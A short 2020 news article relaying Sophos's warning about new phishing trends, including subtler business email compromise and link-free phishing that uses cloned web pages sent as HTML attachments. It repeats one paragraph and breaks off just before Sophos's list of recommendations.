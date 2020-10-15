UK-based cybersecurity firm Sophos has warned against the emergence of new email phishing scams, which sneak malware and exploits into the network, and credentials and sensitive data out.

As email continues to dominate business communications both internally and externally, said it remains to be the most common entry point for cyberattacks, according to Sophos.

The latest data from SophosLabs showed that in September 2020, 97% of the malicious spam caught by its spam traps were phishing emails, hunting for credentials or other information.

The remaining 3% was a mixed bag of messages carrying links to malicious websites or with booby-trapped attachments, variously hoping to install backdoors, remote access trojans (RATs), information stealer or exploits or to download other malicious files.

Phishing remains a frighteningly effective tactic for attackers, as operators behind them continue to refine their skills and enhance the sophistication of their campaigns, said Sophos.

Sophos noted two recent examples on the rise:

Business Email Compromise (BEC): No longer confined to poorly spelled or formatted messages pretending to come from the CEO and demanding the immediate and confidential transfer of significant funds, the latest iterations are subtler and smarter. The attackers are doing their groundwork before launching the attack. They get to know the business and the target executives, adopting their language style and tone, and sometimes even actual email accounts. The absence of malicious links or attachments in such emails make them difficult to detect with traditional security tools.

No longer confined to poorly spelled or formatted messages pretending to come from the CEO and demanding the immediate and confidential transfer of significant funds, the latest iterations are subtler and smarter. The attackers are doing their groundwork before launching the attack. They get to know the business and the target executives, adopting their language style and tone, and sometimes even actual email accounts. The absence of malicious links or attachments in such emails make them difficult to detect with traditional security tools. Phishing emails without links: These phishing emails bring cloned websites as HTML attachments. The attachment would simply open up the enclosed Web page in the comparative safety of victims’ browser’s sandbox and ask them to unwittingly fill-up forms that will send off their data to websites controlled by criminals. Email passwords are among the most valuable credentials for crooks to acquire, simply because many people use their email account for password resets on a multitude of other accounts.

To avoid these new phishing scams, Sophos recommended the following: